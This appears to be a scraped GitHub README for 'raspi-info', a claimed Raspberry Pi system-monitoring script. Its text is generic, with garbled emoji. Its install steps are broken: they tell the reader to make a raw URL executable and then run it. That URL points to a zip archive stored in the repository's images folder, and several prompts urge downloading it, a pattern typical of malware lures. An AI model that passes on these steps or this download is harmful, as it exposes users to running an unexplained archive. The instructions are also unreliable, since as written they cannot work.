GitHunt
HA

Hauntend/raspi-info

πŸ” Gather essential details about your Raspberry Pi with raspi-info, the all-in-one tool for monitoring hardware, software, and network information.

πŸ› οΈ raspi-info - Your All-in-One Raspberry Pi Tool

πŸš€ Getting Started

Welcome to raspi-info! This tool helps you monitor your Raspberry Pi's system information easily. You can check CPU stats, temperature, network status, and more. Let’s get you set up.

πŸ“₯ Download Now

Download raspi-info

πŸ“ Overview

raspi-info is designed to provide essential information about your Raspberry Pi system. Whether you're a hobbyist or a seasoned administrator, this tool helps you keep an eye on performance metrics. You will find features to track:

  • CPU usage and temperature
  • Disk space and storage details
  • Network stats and configuration
  • Apcupsd for power management

βš™οΈ System Requirements

To run raspi-info, you will need:

  • A Raspberry Pi device (any model supported)
  • An OS that supports bash (e.g., Raspbian, Debian)
  • Basic command-line access

πŸ“₯ Download & Install

Visit the Releases page to download the latest version of raspi-info. Here’s how you can set it up:

  1. Click on the Releases page.
  2. Locate the latest release.
  3. Find the file suitable for your Raspberry Pi.
  4. Click the download link to start the download.

Once downloaded, follow these steps to install and run:

  1. Open your terminal.
  2. Navigate to the directory where you downloaded the file. Use the cd command:
    cd /path/to/directory
    
  3. Make the script executable:
    chmod +x https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip
    
  4. Run the script:
    https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip
    

βš™οΈ Features

πŸ“Š CPU Stats

Monitor your Raspberry Pi's CPU usage in real-time. Check how hard your processor is working with easy-to-read graphs.

🌑️ CPU Temperature

Keep an eye on the temperature of your CPU. Prevent overheating by monitoring temperatures directly from the interface.

πŸ’Ύ Disk Space

Check your available storage with a simple command. This feature helps you avoid running out of space unexpectedly.

🌐 Network Information

Get details about your network interface, such as IP addresses and connection status. This helps troubleshoot connectivity issues quickly.

πŸ“¦ Apcupsd Support

If you have a compatible UPS, raspi-info can report on its status. Make sure your devices stay powered during outages.

πŸ› οΈ Troubleshooting

If you encounter issues:

  • Double-check the permissions of the downloaded file.

  • Ensure your Raspberry Pi is up to date. Run:

    sudo apt update && sudo apt upgrade
    
  • Refer to the Issues section on this repository if you need additional help.

🀝 Contributing

If you want to improve raspi-info, contributions are welcome. Feel free to fork the repository, make your changes, and submit a pull request. We appreciate any improvements or bug fixes!

πŸ“ License

raspi-info is licensed under the MIT License. You are free to use, modify, and distribute it as long as you provide credit to the original authors.

πŸ’¬ Support

If you have questions or need help with raspi-info, please use the Discussions section to connect with other users and contributors.

For direct support, you can also open an issue in the Issues section mentioned above.

πŸ“š Additional Resources

Don't forget to download raspi-info by visiting the Releases page for the latest version. Enjoy your hassle-free monitoring experience!